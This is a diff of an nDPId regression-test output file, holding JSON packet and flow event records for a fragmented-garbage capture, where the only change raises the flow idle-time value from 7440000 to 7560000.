@@ -15650,8 +15650,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7824,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAl4mKigpKComXiUkI0AjJCU="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7825,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031998} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7825,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAl4mKigqJl4l"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032298,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQjJiooS0lKSEdGRDIqJkRIiQAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032298,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQjJiooS0lKSEdGRDIqJkRIiQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7827,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032298} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7827,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkZHSEpLJl4lJCMjRVRSJVk="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7828,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032298} 
@@ -16276,8 +16276,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8137,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkkqT1B7IjpoZGZsa2RhPkw="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8138,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244032302} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":8138,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjxNTkJIR0ZE"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032602,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkVXI0AkJV5IQkdWCjQyMTQCqQAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032602,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkVXI0AkJV5IQkdWCjQyMTQCqQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8140,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032602} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8140,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjYzMTk4MjA1MSkoKiZeJSQ="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8141,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032602} 
@@ -16902,8 +16902,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8450,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiQlXiYqKComXiUkI3JzZGw="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8451,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244032607} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":8451,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAnVoZ2tmZHNi"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244032907,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAmtudmMvLnRnZnRnP0dSP0cRsQAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244032907,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAmtudmMvLnRnZnRnP0dSP0cRsQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8453,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032907} 
00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":8453,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAlI\/c1I\/NzQ4Mzk2KSgqJl4="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8454,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032907} 
@@ -17528,8 +17528,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8763,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkAhQCMkJV4mKigpKComXiU="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8764,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244032911} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":8764,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiQjQCMkJV4m"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiooKiZeJSQjJiooS0lKSEc0yAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiooKiZeJSQjJiooS0lKSEc0yAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8766,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244033211} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8766,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkZEMiomREZHSEpLJl4lJCM="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8767,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244033211} 
@@ -18154,64 +18154,64 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":9076,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAlIlWV5VJkkqT1B7IjpoZGY="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244033215} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAmxrZGE+TDxN"} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
